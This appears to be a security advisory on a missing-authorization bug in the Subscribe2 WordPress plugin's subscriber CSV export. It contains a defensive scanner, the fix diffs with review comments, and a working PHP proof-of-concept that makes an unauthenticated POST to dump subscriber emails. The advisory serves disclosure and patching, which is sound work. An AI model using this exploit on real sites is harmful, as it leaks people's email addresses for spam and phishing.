Atomic Edge analysis of CVE-2026-24944:
The Subscribe2 WordPress plugin, versions up to and including 10.44, contains a missing authorization vulnerability in its CSV export functionality. This flaw allows unauthenticated attackers to trigger a data export action, leading to unauthorized information disclosure. The CVSS score of 5.3 reflects a medium severity impact.
The root cause is the absence of capability checks and nonce verification in the `s2_admin` handler within the `class-s2-core.php` file. The vulnerable code path begins at line 2364 in `subscribe2/classes/class-s2-core.php`. The condition `if ( isset( $_POST['s2_admin'] ) && isset( $_POST['csv'] ) )` executes the export logic without validating the user's permissions or the request's authenticity. The function lacks any authorization mechanism before processing the request and generating the CSV file.
Exploitation requires sending a POST request to a WordPress page that loads the Subscribe2 plugin, typically an admin page. The attacker must include two parameters: `s2_admin` (any value) and `csv` (any value). No authentication cookies or session tokens are required. The request triggers the export logic, which outputs subscriber data as a CSV file directly to the browser. Attackers can automate this using tools like cURL or by crafting a malicious web page that submits the form.
The patch adds two security checks before processing the export request. First, it verifies the user has the `manage_options` capability (or a custom capability via the `s2_capability` filter). Second, it validates a WordPress nonce named `s2-export-csv`. The nonce field is added to the export form in `admin/subscribers.php` at line 228. If either check fails, the script terminates with `wp_die()`. The plugin version number is updated from 10.44 to 10.45 in `subscribe2.php`.
Successful exploitation results in unauthorized data disclosure. The CSV export contains the plugin’s subscriber list, which includes email addresses and potentially other subscription metadata. This constitutes a breach of user privacy and could facilitate spam campaigns or targeted phishing attacks. The vulnerability does not allow modification or deletion of data, limiting the impact to information exposure.
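As an added review aid (not Subscribe2 or Atomic Edge code), the following heuristic scanner looks for the bug class described above: a `$_POST`-triggered branch with neither a capability check nor a nonce check nearby. The two PHP snippets are constructed to mirror the shape of the export handler before and after the fix; the scanner is a regex heuristic, so hits are items to review, not confirmed findings.

```python
import re

# Regexes for the shape of the handler and the two guard calls the patch adds.
POST_BRANCH_RE = re.compile(r"^\s*if\b.*isset\(\s*\$_POST\[")
CAPABILITY_RE = re.compile(r"\bcurrent_user_can\s*\(")
NONCE_RE = re.compile(r"\b(?:wp_verify_nonce|check_admin_referer|check_ajax_referer)\s*\(")


def find_unguarded_post_branches(php_source: str, window: int = 15) -> list:
    """For each `if (... isset($_POST[...]) ...)` line, scan the next `window`
    lines for a capability check and a nonce check and report what is missing.
    Heuristic: a guard living in the caller is not seen, so hits are review items."""
    lines = php_source.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        if not POST_BRANCH_RE.search(line):
            continue
        body = "\n".join(lines[idx + 1 : idx + 1 + window])
        missing = []
        if not CAPABILITY_RE.search(body):
            missing.append("capability")
        if not NONCE_RE.search(body):
            missing.append("nonce")
        findings.append({"line": idx + 1, "condition": line.strip(), "missing": missing})
    return findings


# Constructed sample mirroring the pre-fix export branch: no guards at all.
VULNERABLE = """\
// Capture CSV export.
if ( isset( $_POST['s2_admin'] ) && isset( $_POST['csv'] ) ) {
    $date = gmdate( 'Y-m-d' );
    header( 'Content-type: application/octet-stream' );
}
"""

# Constructed sample mirroring the post-fix branch: capability and nonce checks first.
PATCHED = """\
if ( isset( $_POST['s2_admin'] ) && isset( $_POST['csv'] ) ) {
    if ( ! current_user_can( apply_filters( 's2_capability', 'manage_options', 'manage' ) ) ) {
        wp_die( 'Not permitted.' );
    }
    if ( ! isset( $_REQUEST['s2-export-csv'] ) ||
         ! wp_verify_nonce( sanitize_key( $_REQUEST['s2-export-csv'] ), 's2-export-csv' ) ) {
        wp_die( 'Request cannot be completed.' );
    }
    $date = gmdate( 'Y-m-d' );
}
"""
```

Running `find_unguarded_post_branches(VULNERABLE)` reports the export branch with both `capability` and `nonce` missing, while the patched sample yields an empty `missing` list.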
--- a/subscribe2/admin/subscribers.php
+++ b/subscribe2/admin/subscribers.php
@@ -225,6 +225,7 @@
echo '</h2>';
echo '<form method="post">' . "rn";
echo '<input type="hidden" name="s2_admin" />' . "rn";
+echo wp_nonce_field( 's2-export-csv', 's2-export-csv' );
$exclude = array();
switch ( $current_tab ) {
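Review bot: the added line `echo wp_nonce_field( 's2-export-csv', 's2-export-csv' );` emits the hidden nonce input twice, because `wp_nonce_field()` already prints the field when its fourth argument (`$display`) is left at its default of true and additionally returns the markup. Either drop the `echo` or pass `false` as the fourth argument (`echo wp_nonce_field( 's2-export-csv', 's2-export-csv', true, false );`). Both copies carry the same value so verification still succeeds, but the duplicate input should not ship.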
--- a/subscribe2/classes/class-s2-core.php
+++ b/subscribe2/classes/class-s2-core.php
@@ -2364,6 +2364,19 @@
// Capture CSV export.
if ( isset( $_POST['s2_admin'] ) && isset( $_POST['csv'] ) ) {
+ // Security check: Verify user has proper capabilities.
+ if ( ! current_user_can( apply_filters( 's2_capability', 'manage_options', 'manage' ) ) ) {
+ wp_die( 'Not permitted.' );
+ }
+
+ // Security check: Verify nonce.
+ if (
+ ! isset( $_REQUEST['s2-export-csv'] ) ||
+ ! wp_verify_nonce( sanitize_key( $_REQUEST['s2-export-csv'] ), 's2-export-csv' )
+ ) {
+ wp_die( 'Request cannot be completed.' );
+ }
+
$date = gmdate( 'Y-m-d' );
header( 'Content-Description: File Transfer' );
header( 'Content-type: application/octet-stream' );
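Review bot: the nonce is read from `$_REQUEST['s2-export-csv']` while the branch itself is triggered by `$_POST['s2_admin']` and `$_POST['csv']`; reading the nonce from `$_POST` as well keeps the whole check on the submitted form body rather than also accepting it from the query string. Separately, the two `wp_die()` calls use hard-coded English strings and the default response code; consider passing them through the plugin's translation functions and returning a 403, e.g. `wp_die( esc_html__( 'Not permitted.', 'subscribe2' ), '', array( 'response' => 403 ) );`, so the denial is both localized and visible as an authorization failure in server logs. The ordering (capability first, then nonce) is fine.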
--- a/subscribe2/subscribe2.php
+++ b/subscribe2/subscribe2.php
@@ -3,7 +3,7 @@
Plugin Name: Subscribe2
Plugin URI: https://getwemail.io
Description: Notifies an email list when new entries are posted.
-Version: 10.44
+Version: 10.45
Author: weMail
Author URI: https://getwemail.io
Licence: GPLv3
@@ -55,7 +55,7 @@
// Our version number. Don't touch this or any line below.
// Unless you know exactly what you are doing.
-define( 'S2VERSION', '10.44' );
+define( 'S2VERSION', '10.45' );
define( 'S2PLUGIN', __FILE__ );
define( 'S2PATH', trailingslashit( dirname( __FILE__ ) ) );
define( 'S2DIR', trailingslashit( dirname( plugin_basename( __FILE__ ) ) ) );
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24944 - Subscribe2 <= 10.44 - Missing Authorization
$target_url = 'http://example.com/wp-admin/admin.php?page=s2_tools';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
// The exploit requires two parameters: s2_admin and csv.
// Their values are arbitrary; presence triggers the vulnerable code path.
curl_setopt($ch, CURLOPT_POSTFIELDS, 's2_admin=1&csv=1');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// No authentication cookies are needed.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
// Check if the response appears to be a CSV file.
// The vulnerable endpoint outputs CSV headers and data.
if (strpos($response, 'Content-type: application/octet-stream') !== false ||
strpos($response, 'email,') !== false) {
echo "[+] Vulnerability likely exploited. CSV data received.\n";
echo "[+] First 500 characters of response:\n";
echo substr($response, 0, 500) . "\n";
} else {
echo "[-] Request succeeded but no CSV data detected.\n";
}
} else {
echo "[-] Request failed with HTTP code: $http_code\n";
}
?>